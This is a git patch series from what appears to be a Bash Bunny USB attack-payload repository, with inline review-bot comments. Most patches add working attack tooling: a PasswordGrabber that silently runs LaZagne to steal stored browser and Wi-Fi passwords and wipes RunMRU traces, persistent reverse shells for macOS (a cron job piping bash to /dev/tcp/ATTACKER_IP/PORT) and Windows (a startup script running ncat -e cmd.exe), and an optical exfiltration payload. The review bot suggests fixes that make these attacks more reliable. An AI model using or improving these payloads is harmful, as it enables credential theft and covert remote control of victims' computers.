From 650772e9e40c13df67cd0a5c4cbbff28cd755bb2 Mon Sep 17 00:00:00 2001 From: bg-wa Date: Tue, 9 Jan 2018 14:22:29 -0800 Subject: [PATCH 01/16] Added debug extension (#155)
---
 payloads/extensions/debug.sh | 40 ++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 payloads/extensions/debug.sh
diff --git a/payloads/extensions/debug.sh b/payloads/extensions/debug.sh
new file mode 100644
index 00000000..e58b0b66
--- /dev/null
+++ b/payloads/extensions/debug.sh
@@ -0,0 +1,40 @@
+#!/bin/bash
+
+################################################################################
+# Allow Debugging messages written to: "/root/udisk/debug/[session].txt"
+# on the BashBunny
+#
+# How this works?
+# 1) Example Command: DEBUG "switch-1-debug" "Hello from debug extension!"
+# 2) After bashing, text can be read at: "/root/udisk/debug/[session].txt"
+# on the BashBunny
+################################################################################
+
+function DEBUG() {
+ session = $1
+ message = $2
+
+ init_debug
+ debug_log
+
+ timestamp () {
+ echo "$(date +"%Y-%m-%d_%H-%M-%S")"
+ }
+
+ init_debug () {
+ DEBUG_FILE="/root/udisk/debug/$(session).txt"
+ if [ ! -d "/root/udisk/debug/" ]; then
+ mkdir /root/udisk/debug/
+ fi
+ if [ ! -f "/root/udisk/debug/${DEBUG_FILE}" ]; then
+ touch "${DEBUG_FILE}"
+ echo "$(timestamp): DEBUG STARTED" >> "${DEBUG_FILE}"
+ fi
+ }
+
+ debug_log () {
+ echo "$(timestamp): $(message)" >> "${DEBUG_FILE}"
+ }
+}
+
+export -f DEBUG
From 940dc0904369f271a587a31bee2b9221ba28118a Mon Sep 17 00:00:00 2001
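Review bot: `session`, `message` and `DEBUG_FILE` inside `DEBUG` are assigned without `local`, so because the function is `export -f`ed and runs in the calling payload's shell, every `DEBUG` call silently overwrites any variable of the same name the payload itself uses. Declare them as `local session=$1`, `local message=$2` and a local file variable; the same applies to the rewrite of this function in PATCH 06/16 of this series, which keeps `session=$1` and `message=$2` global. The header comment could also state that the function must be called from a payload running as the shell that sources the extension, since `export -f` is what makes `DEBUG` visible there.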
From: =?UTF-8?q?Jonathan=20Deb=C3=A9taz?= Date: Mon, 15 Jan 2018 06:36:49 +0100 Subject: [PATCH 02/16] Payload updates (#309) --- .../library/credentials/PasswordGrabber/d.cmd | 4 -- .../library/credentials/PasswordGrabber/e.cmd | 24 --------- .../library/credentials/PasswordGrabber/i.vbs | 1 - .../credentials/PasswordGrabber/payload.ps1 | 5 ++ .../credentials/PasswordGrabber/payload.txt | 38 +++++++++----- .../credentials/PasswordGrabber/readme.md | 49 +++++++++---------- 6 files changed, 53 insertions(+), 68 deletions(-) delete mode 100644 payloads/library/credentials/PasswordGrabber/d.cmd delete mode 100644 payloads/library/credentials/PasswordGrabber/e.cmd delete mode 100644 payloads/library/credentials/PasswordGrabber/i.vbs create mode 100644 payloads/library/credentials/PasswordGrabber/payload.ps1 diff --git a/payloads/library/credentials/PasswordGrabber/d.cmd b/payloads/library/credentials/PasswordGrabber/d.cmd deleted file mode 100644 index 604ef639..00000000 --- a/payloads/library/credentials/PasswordGrabber/d.cmd +++ /dev/null @@ -1,4 +0,0 @@ -@echo off -start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" -cscript %~dp0\i.vbs %~dp0\e.cmd -@exit \ No newline at end of file diff --git a/payloads/library/credentials/PasswordGrabber/e.cmd b/payloads/library/credentials/PasswordGrabber/e.cmd deleted file mode 100644 index 27792067..00000000 --- a/payloads/library/credentials/PasswordGrabber/e.cmd +++ /dev/null 
@@ -1,24 +0,0 @@ -@echo off -@echo Installing Windows Update - -setlocal -cd /d %~dp0 - -REM Time and Date -set drec=%COMPUTERNAME%_%date%_%TIME: =0% -set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec% -mkdir %dst% >>nul - -REM This executes LaZagne in the current directory and outputs the password file to Loot -%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt" - - -if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* ( -xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul -) - -REM Blink CAPSLOCK key -start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" - -@cls -@exit diff --git a/payloads/library/credentials/PasswordGrabber/i.vbs b/payloads/library/credentials/PasswordGrabber/i.vbs deleted file mode 100644 index 1ffd3c3e..00000000 --- a/payloads/library/credentials/PasswordGrabber/i.vbs +++ /dev/null @@ -1 +0,0 @@ -CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False diff --git a/payloads/library/credentials/PasswordGrabber/payload.ps1 b/payloads/library/credentials/PasswordGrabber/payload.ps1 new file mode 100644 index 00000000..885f9caf --- /dev/null +++ b/payloads/library/credentials/PasswordGrabber/payload.ps1 
@@ -0,0 +1,5 @@ +$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber') +$filter = 'password_'+ $env:COMPUTERNAME +$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) +Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tools\laZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt') +Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue \ No newline at end of file diff --git a/payloads/library/credentials/PasswordGrabber/payload.txt b/payloads/library/credentials/PasswordGrabber/payload.txt index 797dab41..560c3ae4 100644 --- a/payloads/library/credentials/PasswordGrabber/payload.txt +++ b/payloads/library/credentials/PasswordGrabber/payload.txt 
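Review bot: Nothing checks that the `BashBunny` volume was actually found: if `Get-WmiObject win32_volume -f 'label=''BashBunny'''` returns nothing, `.Name` is `$null` and both `$dest` and the laZagne path on the `Start-Process` line collapse to the relative strings `loot\PasswordGrabber` and `tools\laZagne.exe`, resolved against whatever the current directory is, while the script still runs on to the final `Remove-ItemProperty`. Resolve the volume once and stop when it is missing, e.g. `$bunny = (Get-WmiObject win32_volume -f 'label=''BashBunny''').Name` followed by `if (-not $bunny) { exit 1 }`, and build `$dest` and the `-FilePath` argument from `$bunny`. That also removes the duplicated WMI query between the first and fourth lines.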
@@ -1,19 +1,33 @@ #!/bin/bash # # Title: Password Grabber -# Author: Razerblade -# Version: 1.2 -# Target: Windows -# Props: Hak5Darren, TeCHemically, dragmus31 +# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... +# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. +# This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. +# Author: jdebetaz +# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade +# Version: 1.1 # Category: Credentials -# -# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, -# which in turn executes e.cmd invisibly using i.vbs -# which in turn steals credentials by using LaZagne and saves them to /Loot -# +# Target: Windows +# Attackmodes: HID, STORAGE + +# Options +LOOTDIR=/root/udisk/loot/PasswordGrabber + +######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION -LED ATTACK ATTACKMODE HID STORAGE -RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" -LED FINISH + +######## MAKE LOOT DIRECTORY ######## +# Setup named logs in loot directory +mkdir -p $LOOTDIR + +######## ATTACK ######## +LED ATTACK +RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')" +# Wait until passwords are grabbed. +sleep 10 + +######## FINISH ######## +LED FINISH \ No newline at end of file diff --git a/payloads/library/credentials/PasswordGrabber/readme.md b/payloads/library/credentials/PasswordGrabber/readme.md index 18129740..31fe7418 100644 --- a/payloads/library/credentials/PasswordGrabber/readme.md +++ b/payloads/library/credentials/PasswordGrabber/readme.md 
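Review bot: The new header sets `# Version: 1.1` while the readme.md changed in this same commit says `Version: 1.3` and the header line being removed said `1.2`, so the version goes backwards in one file and forwards in the other; pick one value and use it in both. `mkdir -p $LOOTDIR` leaves the expansion unquoted although the rest of the file is bash under `#!/bin/bash`; `mkdir -p "$LOOTDIR"` keeps it safe if the option is ever edited to a path with spaces. The `# Options` block could also note that `LOOTDIR` is the Bunny-side view of the same `loot\PasswordGrabber` folder that payload.ps1 writes to over the STORAGE attack mode, since that relationship is otherwise only visible by reading both files.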
@@ -1,40 +1,35 @@ # PasswordGrabber -* Author: RazerBlade -* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31 -* Version: Version 1.2 -* Firmware support: 1.1+ -* Target: Windows 7+ +* Author: [jdebetaz](https://github.com/jdebetaz) +* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade +* Version: 1.3 +* Frimware support: 1.1 and higher +* Target version: Windows 7 and higher ## Description +Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. -Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... -This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. -This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. - -Full read here: https://github.com/AlessandroZ/LaZagne -Downloads here: https://github.com/AlessandroZ/LaZagne/releases - +Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne) ## Configuration -1. You need to download the latest file from LaZagnes release page. -2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe -3. Plug it in a computer and PWN them. +1. You need to download the lastest file from [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). +2. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe +3. Plug your BashBunny and Enjoy -Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file. 
+Tips: You may need to disable your antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file. -## INFO -By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. +## Info +jdebetaz: I remake this playload with the Payload Best Practice / Style Guide -## DISCLAIMER -Hak5 is not responsible for the execution of 3rd party binaries. -## STATUS +RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. -| LED | Status | -| ------------------ | -------------------------------------------- | -| Red | Attack Setup | -| Green | Attack Complete | +## Disclaimer +__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__ -## Discussion -[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/ +## Led status +| LED | Status | +|-----------------------------------------------|--------| +| Magenta solid | Setup | +| Yellow single blink | Attack | +| Green 1000ms VERYFAST blink followed by SOLID | Finish | From b644446f40a4de18e57facd978d32d7fbd7cc043 Mon Sep 17 00:00:00 2001 From: Simon Dankelmann Date: Mon, 22 Jan 2018 00:37:26 +0100 Subject: [PATCH 03/16] Added German umlauts to de.json (#311) --- languages/de.json | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) mode change 100644 => 100755 languages/de.json diff --git a/languages/de.json b/languages/de.json old mode 100644 new mode 100755 index aced3056..fe659267 --- a/languages/de.json +++ b/languages/de.json @@ -17,6 +17,7 @@ "__comment":" ", "__comment":"A = LeftShift + a, { = LeftShift + [", "__comment":" ", + "__comment":"German umlauts added by Simon Dankelmann", "a":"00,00,04", "b":"00,00,05", "c":"00,00,06", 
@@ -165,5 +166,14 @@ "|":"40,00,64", "COMMAND-CTRL-SHIFT":"40,00,64", "COMMAND-CTRL":"40,00,64", - "COMMAND-OPTION-SHIFT'":"40,00,64" -} \ No newline at end of file + "COMMAND-OPTION-SHIFT'":"40,00,64", + "ß":"00,00,2d", + "€":"40,00,08", + "§":"02,00,20", + "ä":"00,00,34", + "ö":"00,00,33", + "ü":"00,00,2f", + "Ä":"02,00,34", + "Ö":"02,00,33", + "Ü":"02,00,2f" +} From a998f5c86ca0aee3cd2adb0ed11f6f3a4ac380f5 Mon Sep 17 00:00:00 2001 From: c64whiz Date: Sun, 21 Jan 2018 15:38:38 -0800 Subject: [PATCH 04/16] Add random interval to InfiniteControl payload (#310) --- .../library/general/InfiniteControl/payload.txt | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/payloads/library/general/InfiniteControl/payload.txt b/payloads/library/general/InfiniteControl/payload.txt index d35fc3ce..5a0e6936 100644 --- a/payloads/library/general/InfiniteControl/payload.txt +++ b/payloads/library/general/InfiniteControl/payload.txt @@ -26,6 +26,13 @@ ATTACKMODE HID INFINITE_KEY=CTRL #INFINITE_KEY=BREAK +# Setting MAX_SECONDS will utilize random value +# else leave blank, "MAX_SECONDS=", to use +# FIXED_SECONDS value every time. +# 300 == 5min +MAX_SECONDS=300 +FIXED_SECONDS=9 + # infinite while loop while true do @@ -33,7 +40,13 @@ do QUACK $INFINITE_KEY sleep 1 LED ATTACK - sleep 9 + # Slight change from original to support "random" + # delays between key presses. + if [ ! -z MAX_SECONDS ]; then + sleep $(($RANDOM % $MAX_SECONDS)) + else + sleep $FIXED_SECONDS + fi done # this code will never be reached From 7f902403d49961614d3d2cfd34c4db16a3ea5441 Mon Sep 17 00:00:00 2001 
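Review bot: In the second hunk of the InfiniteControl change, `if [ ! -z MAX_SECONDS ]; then` tests the literal string `MAX_SECONDS`, which is never empty, so the `else` branch using `FIXED_SECONDS` is unreachable, and leaving `MAX_SECONDS=` blank as the comment in the first hunk recommends makes `$(($RANDOM % $MAX_SECONDS))` fail with an arithmetic syntax error instead of falling back. The test should read the variable: `if [ -n "$MAX_SECONDS" ]; then`. Note also that `$RANDOM % $MAX_SECONDS` can evaluate to 0, so the minimum delay is no wait at all; if a lower bound is intended, `sleep $(( RANDOM % MAX_SECONDS + 1 ))` guarantees at least one second.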
From: KeenanV Date: Sun, 21 Jan 2018 15:39:14 -0800 Subject: [PATCH 05/16] Persistent Reverse Shells for MacOS and Windows 10 (#306) --- .../MacPersistentReverseShell/README.md | 44 ++++++++++++++++++ .../MacPersistentReverseShell/payload.txt | 32 +++++++++++++ .../WindowsPersistentReverseShell/README.md | 45 +++++++++++++++++++ .../WindowsPersistentReverseShell/payload.txt | 18 ++++++++ .../persistence.vbs | 7 +++ .../WindowsPersistentReverseShell/run.ps1 | 20 +++++++++ 6 files changed, 166 insertions(+) create mode 100644 payloads/library/remote_access/MacPersistentReverseShell/README.md create mode 100644 payloads/library/remote_access/MacPersistentReverseShell/payload.txt create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/README.md create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 diff --git a/payloads/library/remote_access/MacPersistentReverseShell/README.md b/payloads/library/remote_access/MacPersistentReverseShell/README.md new file mode 100644 index 00000000..591202e4 --- /dev/null +++ b/payloads/library/remote_access/MacPersistentReverseShell/README.md 
@@ -0,0 +1,44 @@ +# Reverse Shell Mac for Bash Bunny + +* Author: 0dyss3us (KeenanV) +* Version: 1.2 + +## Description + +Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP. +* Targets MacOS +* Connection can be closed and reconnected at any time +* Deploys in roughly 23 sec +* Works well with NetCat as the listener + +## Requirements + +Have a working Bash Bunny :) + +## STATUS + +| LED | STATUS | +| -------------------- | ---------------------------- | +| Purple | Setup | +| Amber (Single Blink) | Launching Terminal | +| Amber (Double Blink) | Creating cron job | +| White (Fast Blink) | Cleaning up | +| Green | Finished | + +## Configuration and Execution + +1. Plug in Bash Bunny in arming mode +2. Move files from MacPersistentReverseShell to either switch folder +3. Edit the payload.txt file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:) +5. Unplug Bash Bunny and switch it to the position the payload is loaded on +6. Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec) +7. Unplug the Bash Bunny and go to attacker's machine +8. Listen on the port you chose in the payload.txt file on whichever program you'd like (I use NetCat) + * If using NetCat, run the command `nc -nlvp 1337` (replace the port with the port in connect.sh) + * If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command `ncat` instead of `nc` from the directory that you installed ncat.exe. +9. Wait for connection (Should take no longer than 1 minute as the cron job runs every minute) +10. Once a bash shell prompt appears...YOU'RE DONE!! 
:smiley: and you can disconnect and reconnect to the victim at any time as long as the user is logged in + +## Discussion + +[Click here](https://forums.hak5.org/topic/42728-payload-mac-persistent-reverse-shell/) to access the forum post. diff --git a/payloads/library/remote_access/MacPersistentReverseShell/payload.txt b/payloads/library/remote_access/MacPersistentReverseShell/payload.txt new file mode 100644 index 00000000..f25b9034 --- /dev/null +++ b/payloads/library/remote_access/MacPersistentReverseShell/payload.txt @@ -0,0 +1,32 @@ +# Title: Mac Persistent Reverse Shell +# Description: Creates a persistent reverse shell on Mac victim that connects back to NetCat host +# Author: 0dyss3us (KeenanV) +# Props: +# Version: 1.2 +# Category: Remote Access +# Target: MacOS +# Attackmodes: HID, Storage + +# Sets attack modes and stores current switch position +LED SETUP +ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E +GET_SWITCH_POSITION + +# Opens the terminal +LED STAGE1 +RUN OSX terminal +Q DELAY 2000 + +# Makes a cron job that will run once every minute +Q STRING \(crontab -l 2\>/dev/null\; echo \"\* \* \* \* \* bash -i \>\& /dev/tcp/ATTACKER_IP/PORT 0\>\&1\"\) \| crontab - +Q ENTER +Q DELAY 2000 + +LED CLEANUP +# Clears and kills the terminal to hide the evidence +Q STRING clear +Q ENTER +Q DELAY 500 +Q STRING killall Terminal +Q ENTER +LED FINISH diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/README.md b/payloads/library/remote_access/WindowsPersistentReverseShell/README.md new file mode 100644 index 00000000..2b318c6c --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/README.md 
@@ -0,0 +1,45 @@ +# Windows Persistent Reverse Shell for Bash Bunny + +* Author: 0dyss3us (KeenanV) +* Version: 1.1 + +## Description + +Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. +* Targets Windows 10 (working on support for older versions) +* Connection can be closed and reconnected at any time +* Deploys in roughly 15-20 sec +* Works with NetCat + +## Requirements + +Have a working Bash Bunny :) + +## STATUS + +| LED | STATUS | +| -------------------- | ------------------------------ | +| Purple | Setup | +| Amber (Single Blink) | Installing and running scripts | +| Green | Finished | + +## Installation and Execution + +1. Plug in Bash Bunny in arming mode +2. Move files from WindowsPersistentReverseShell to either switch folder +3. Download ncat from http://nmap.org/dist/ncat-portable-5.59BETA1.zip and place the downloaded ncat.exe file in the same switch folder. +4. Edit the persistence.vbs file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:) +5. Edit the run.ps1 file and replace `BashBunny` with the volume name of your Bash Bunny +6. Save the persistence.vbs file +7. Unplug Bash Bunny and switch it to the position the payload is loaded on +8. Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) +9. Unplug the Bash Bunny and go to attacker's machine +10. Listen on the port you chose in the persistence.vbs file on NetCat + * Run the command `nc -nlvp 1337` (replace the port with the port in persistence.vbs) + * If using Windows as the attacker machine, you must move the same ncat.exe file downloaded in step 3 to any directory and use the command `ncat` instead of `nc` from that directory. +11. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) +12. Once a Windows cmd prompt appears...YOU'RE DONE!! 
:smiley: and you can disconnect and reconnect at any time as long as the user is logged in + +## Discussion + +[Click here](https://forums.hak5.org/topic/42729-payload-windows-persistent-reverse-shell/) for forum discussion diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt b/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt new file mode 100644 index 00000000..fc89bd61 --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt @@ -0,0 +1,18 @@ +# Title: NetCat Reverse Shell Windows +# Description: Creates a persistent reverse shell on Windows and connects back to attacker through NetCat +# Author: 0dyss3us (KeenanV) +# Props: +# Version: 1.0 +# Category: Remote Access +# Target: Windows 10 +# Attackmodes: HID, Storage + +#Sets attack mode and stores current switch position +LED SETUP +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +#Runs Powershell script which puts a .vbs file in the startup folder and runs it +LED ATTACK +RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" +LED FINISH \ No newline at end of file diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs b/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs new file mode 100644 index 00000000..f6db2e03 --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs @@ -0,0 +1,7 @@ +Dim ncShell +Set ncShell = WScript.CreateObject("WScript.shell") + +Do while True: + ncShell.Run "powershell.exe C:\temp\ncat.exe ATTACKER_IP PORT -e cmd.exe", 0, true + WScript.Sleep(60000) +loop diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 b/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 new file mode 100644 index 00000000..b6b81438 --- /dev/null 
+++ b/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 @@ -0,0 +1,20 @@ +$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name +$user = $env:UserName +$NetCatFile = $Drive + "payloads\switch1\ncat.exe" +$PersistenceFile = $Drive + "payloads\switch1\persistence.vbs" +$DestinationFile1 = "C:\temp\ncat.exe" +$DestinationFile2 = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persistence.vbs") + +If ((Test-Path $DestinationFile1) -eq $false){ + New-Item -ItemType File -Path $DestinationFile1 -Force +} +If ((Test-Path $DestinationFile2) -eq $false){ + New-Item -ItemType File -Path $DestinationFile2 -Force +} + +Copy-Item -Path $NetCatFile -Destination $DestinationFile1 +Copy-Item -Path $PersistenceFile -Destination $DestinationFile2 + +Set-Location -Path ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup") + +Start-Process cmd -ArgumentList "/c start persistence.vbs" \ No newline at end of file From b37aed0edcfabe3d4c8550fba3d0601053dd3483 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Tue, 23 Jan 2018 14:12:30 -0500 Subject: [PATCH 06/16] fixes debug extention (#312) - resolve sytax errors with variable declarations - resolve misuse of command substition / variabl dereferencing - internal functions were being called before being declared - remove superfluous file existence checks --- payloads/extensions/debug.sh | 25 ++++++------------------- 1 file changed, 6 insertions(+), 19 deletions(-) diff --git a/payloads/extensions/debug.sh b/payloads/extensions/debug.sh index e58b0b66..f575dfe6 100644 --- a/payloads/extensions/debug.sh +++ b/payloads/extensions/debug.sh 
@@ -11,30 +11,17 @@ ################################################################################ function DEBUG() { - session = $1 - message = $2 - - init_debug - debug_log + session=$1 + message=$2 timestamp () { echo "$(date +"%Y-%m-%d_%H-%M-%S")" } - init_debug () { - DEBUG_FILE="/root/udisk/debug/$(session).txt" - if [ ! -d "/root/udisk/debug/" ]; then - mkdir /root/udisk/debug/ - fi - if [ ! -f "/root/udisk/debug/${DEBUG_FILE}" ]; then - touch "${DEBUG_FILE}" - echo "$(timestamp): DEBUG STARTED" >> "${DEBUG_FILE}" - fi - } - - debug_log () { - echo "$(timestamp): $(message)" >> "${DEBUG_FILE}" - } + mkdir -p /root/udisk/debug/ + debug_file="/root/udisk/debug/${session}.txt" + [[ -f "${debug_file}" ]] || echo "$(timestamp): DEBUG STARTED" >> "${debug_file}" + echo "$(timestamp): ${message}" >> ${debug_file} } export -f DEBUG From 81e6d536dd980475fa2a5df727958535795c4a0d Mon Sep 17 00:00:00 2001 From: bg-wa Date: Fri, 26 Jan 2018 20:47:39 -0800 Subject: [PATCH 07/16] Added Optical Exfiltration Payload (#316) --- .../optical-exfiltration/index.min.html | 26 ++++++++ .../optical-exfiltration/payload.txt | 59 +++++++++++++++++++ 2 files changed, 85 insertions(+) create mode 100644 payloads/library/exfiltration/optical-exfiltration/index.min.html create mode 100755 payloads/library/exfiltration/optical-exfiltration/payload.txt diff --git a/payloads/library/exfiltration/optical-exfiltration/index.min.html b/payloads/library/exfiltration/optical-exfiltration/index.min.html new file mode 100644 index 00000000..811af6c7 --- /dev/null +++ b/payloads/library/exfiltration/optical-exfiltration/index.min.html @@ -0,0 +1,26 @@ + + + + + QR Extract + + + + + +
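Review bot: The final line of `DEBUG` redirects to an unquoted `${debug_file}` while the line above quotes it, so a `session` containing whitespace or glob characters makes the "DEBUG STARTED" line and the message line target different paths; use `>> "${debug_file}"` on both. Separately, `session` is spliced into `/root/udisk/debug/${session}.txt` unchecked, so a value containing `/` (for example `../x`) writes outside the debug directory and an empty value produces `.txt`; rejecting those up front, e.g. `[[ -n "$session" && "$session" != */* ]] || return 1`, keeps the log confined to the directory the header comment promises. The function's header (lines 1-10 of the file) is outside this hunk.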
+

+
+

+ + +
+ + diff --git a/payloads/library/exfiltration/optical-exfiltration/payload.txt b/payloads/library/exfiltration/optical-exfiltration/payload.txt new file mode 100755 index 00000000..a7463e39 --- /dev/null +++ b/payloads/library/exfiltration/optical-exfiltration/payload.txt @@ -0,0 +1,59 @@ +#!/bin/bash +# +# Title: Optical Exfiltration +# Author: bg-wa +# Version: 1.0 +# Category: HID +# Target: *NIX +# Attackmodes: HID +# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor +# +# Quick HID only attack to write an HTML/JS file to target machine +# and open a browser, to exfiltrate data Using QR Codes and a video +# recording device. +# +# | Attack Stage | Description | +# | ------------------- | ---------------------------------------- | +# | SETUP | Open vi | +# | ATTACK | Writing HTML | +# | FINISH | Browser Ready | +# + +ATTACKMODE HID +LED SETUP + +target_html=\~\/index.html + +RUN UNITY xterm +Q DELAY 1000 +Q STRING rm "$target_html" +Q ENTER +Q DELAY 500 +Q STRING vi "$target_html" +Q ENTER +Q DELAY 1000 +Q STRING i + +LED ATTACK + +payload_dir=/root/udisk/payloads/$SWITCH_POSITION +source_html=$payload_dir/index.min.html + +while IFS= read data +do + if [ "${data}" = " " ] + then + Q SPACE + else + Q STRING "$data" + fi +done < "$source_html" + +Q ESC +Q STRING :x +Q ENTER + +Q STRING firefox "$target_html" +Q ENTER + +LED FINISH \ No newline at end of file From 920ff7fa678c75fb89c60c37ee574b70fc7bfde7 Mon Sep 17 00:00:00 2001 From: bg-wa Date: Sat, 27 Jan 2018 15:24:58 -0800 Subject: [PATCH 08/16] New options for optical exfil payload (#317) --- .../exfiltration/optical-exfiltration/index.min.html | 6 +++--- .../exfiltration/optical-exfiltration/payload.txt | 11 ++++++++++- 2 files changed, 13 insertions(+), 4 deletions(-) diff --git a/payloads/library/exfiltration/optical-exfiltration/index.min.html b/payloads/library/exfiltration/optical-exfiltration/index.min.html index 811af6c7..0dcd69d6 100644 
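Review bot: `while IFS= read data` reads `index.min.html` without `-r`, so any backslash sequence in the file is interpreted by `read` and the text typed into vi no longer matches the source; write `while IFS= read -r data || [[ -n "$data" ]]` so backslashes are preserved and a last line without a trailing newline is not dropped. `payload_dir=/root/udisk/payloads/$SWITCH_POSITION` relies on `SWITCH_POSITION` already being set, but unlike the other payloads in this series there is no `GET SWITCH_POSITION` before it; if the firmware does not export it, `source_html` resolves to `/root/udisk/payloads//index.min.html` and the loop reads nothing. `target_html=\~\/index.html` stores the literal text `~/index.html`, which is clearer as `target_html='~/index.html'`.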
--- a/payloads/library/exfiltration/optical-exfiltration/index.min.html +++ b/payloads/library/exfiltration/optical-exfiltration/index.min.html @@ -4,17 +4,17 @@ QR Extract - +

diff --git a/payloads/library/exfiltration/optical-exfiltration/payload.txt b/payloads/library/exfiltration/optical-exfiltration/payload.txt index a7463e39..6f70b5df 100755 --- a/payloads/library/exfiltration/optical-exfiltration/payload.txt +++ b/payloads/library/exfiltration/optical-exfiltration/payload.txt @@ -12,11 +12,20 @@ # and open a browser, to exfiltrate data Using QR Codes and a video # recording device. # +# Optional html params: +# base64: Passing a base64 string to this param will auto-start processing QR Codes. +# +# playback: Passing the string "finish" to this param will auto-play the results, +# when QR codes finish rendering. +# +# Example: +# Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string" +# # | Attack Stage | Description | # | ------------------- | ---------------------------------------- | # | SETUP | Open vi | # | ATTACK | Writing HTML | -# | FINISH | Browser Ready | +# | FINISH | Browser Ready/Processing | # ATTACKMODE HID From 65ad5f6e89a15367325c799ad0ee3e1080b59f37 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: 